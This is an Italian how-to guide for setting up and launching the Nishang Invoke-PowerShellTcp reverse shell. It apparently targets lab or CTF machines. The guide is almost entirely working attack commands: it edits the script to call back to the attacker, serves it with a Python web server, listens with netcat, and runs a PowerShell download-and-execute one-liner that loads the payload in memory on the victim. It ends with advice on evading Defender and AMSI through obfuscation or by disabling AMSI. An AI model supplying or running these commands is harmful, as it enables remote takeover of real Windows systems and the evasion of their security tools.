===============================================================================
GUIDA PRATICA: CONFIGURAZIONE E USO DI NISHANG (INVOKE-POWERSHELLTCP)
===============================================================================

Il file originale del framework Nishang che implementa la reverse shell si chiama
'Invoke-PowerShellTcp.ps1'. Per comodita e rapidita di esecuzione, viene spesso
rinominato in 'rev.ps1'.

Questa guida spiega passo dopo passo come configurare il file, ospitarlo e
lanciarlo sul target.

-------------------------------------------------------------------------------
FASE 1: PREPARAZIONE DEL PAYLOAD (SULLA MACCHINA ATTACCANTE)
-------------------------------------------------------------------------------

1. Trova il file originale su Kali Linux o scaricalo da GitHub:
   Percorso locale: /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1

2. Copia il file nella tua cartella di lavoro rinominandolo in 'rev.ps1':
   $ cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 ./rev.ps1

3. Modifica il file per forzare l'esecuzione automatica.
   Apri 'rev.ps1' con un editor di testo (es. nano o mousepad), vai in fondo 
   al file (all'ultima riga) e aggiungi la chiamata alla funzione, specificando
   il TUO indirizzo IP e la porta su cui rimarrai in ascolto:
   
   Esempio (aggiungi questo in fondo al file):
   Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.66 -Port 4444

4. Salva e chiudi il file.

-------------------------------------------------------------------------------
FASE 2: AVVIO DEI SERVIZI (SULLA MACCHINA ATTACCANTE)
-------------------------------------------------------------------------------

Devi preparare due terminali sulla tua macchina (es. 10.10.14.66):

TERMINALE 1: Avvia un server web HTTP per ospitare il file 'rev.ps1'
   Spostati nella cartella dove risiede il file e digita:
   $ python3 -m http.server 8000

TERMINALE 2: Mettiti in ascolto sulla porta specificata nel file (es. 4444)
   $ nc -lvnp 4444

-------------------------------------------------------------------------------
FASE 3: ESECUZIONE (SULLA MACCHINA TARGET / VITTIMA)
-------------------------------------------------------------------------------

Esegui il seguente comando sul target (tramite shell remota, command injection, 
o prompt dei comandi). Questo comando scarica il file direttamente in memoria 
RAM ed esegue la funzione senza salvare nulla sul disco rigido:

powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.66:8000/rev.ps1')"

Se non hai modificato il file inserendo la riga in fondo (Fase 1.3), puoi 
comunque richiamare la funzione concatenando il comando in questo modo:

powershell -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.66:8000/rev.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.66 -Port 4444"

-------------------------------------------------------------------------------
RISULTATO
-------------------------------------------------------------------------------
Appena il target esegue il comando, vedrai una richiesta GET sul TERMINALE 1 
(Python) e, subito dopo, si aprira una shell PowerShell interattiva sul 
TERMINALE 2 (Netcat), con i privilegi dell'utente che ha eseguito il comando.

CONSIGLIO PER IL BYPASS DEFENDER / AMSI:
I sistemi Windows moderni bloccano questo script a causa delle firme note. In 
scenari reali di test, puo essere necessario offuscare le stringhe principali 
(come 'Invoke-PowerShellTcp') o disabilitare temporaneamente AMSI nella sessione.
===============================================================================
